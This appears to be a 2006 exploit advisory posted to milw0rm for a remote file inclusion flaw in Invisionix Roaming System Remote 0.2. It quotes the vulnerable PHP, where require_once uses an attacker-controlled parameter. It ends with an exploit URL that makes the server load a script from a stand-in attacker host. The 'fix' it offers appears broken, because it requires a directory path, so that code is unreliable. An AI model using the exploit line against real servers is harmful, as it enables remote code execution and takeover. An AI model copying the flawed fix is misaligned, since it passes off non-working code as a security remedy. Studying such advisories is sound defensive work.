/* +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - - - [DEVIL TEAM THE BEST POLISH TEAM] - - + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - IRSR - Invisionix Roaming System Remote <= 0.2 [_sysSessionPath] Remote File Include Vulnerabilities + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - [Script name: IRSR - Invisionix Roaming System Remote v. 0.2 - [Script site: http://www.invisionix.org or http://sourceforge.net/projects/irsr + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Find by: Kacper (a.k.a Rahim) + - Contact: kacper1964@yahoo.pl - or - http://www.devilteam.yum.pl/ - and - http://www.rahim.webd.pl/ + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Special Greetz: DragonHeart :-) - Ema: Leito, Adam, DeathSpeed, Drzewko, pepi + - P.S: Pozdrawiam ludzi z United Crew! + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ + - Z Dedykacja dla osoby, - bez ktorej nie mogl bym zyc... - K.C:* J.M (a.k.a Magaja) + +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ /* vulnerable code => pageheaderdefault.inc.php line 28-36: [code] // // Perform the session handling preprocessing. // require_once ($_sysSessionPath); // Include the session handling functions. mysql_connect($_sysDBhost1,$_sysDBuser1Login,$_sysDBuser1LoginPass) or die("Could NOT obtain authentication info after login! "); mysql_select_db($_sysDBname) or die("Was NOT able to obtain authentication info after login! "); $dblink=@mysql_connect($_sysDBhost1,$_sysDBuser1Login,$_sysDBuser1LoginPass); $session=updateSession($dblink,$session); // Should the user have access to this page? [/code] +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ Fix: [code] $_sysSessionPath = @dirname(@dirname(@dirname(__FILE__))); require_once ($_sysSessionPath); // Include the session handling functions. mysql_connect($_sysDBhost1,$_sysDBuser1Login,$_sysDBuser1LoginPass) or die("Could NOT obtain authentication info after login!"); mysql_select_db($_sysDBname) or die("Was NOT able to obtain authentication info after login!"); $dblink=@mysql_connect($_sysDBhost1,$_sysDBuser1Login,$_sysDBuser1LoginPass); $session=updateSession($dblink,$session); // Should the user have access to this page? [/code] +~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ */ #Exploit: http://www.site.com/[IRSR_path]/system/includes/pageheaderdefault.inc.php?_sysSessionPath=[http://www.myevilsite.com/evil_scripts.txt] # milw0rm.com [2006-08-17]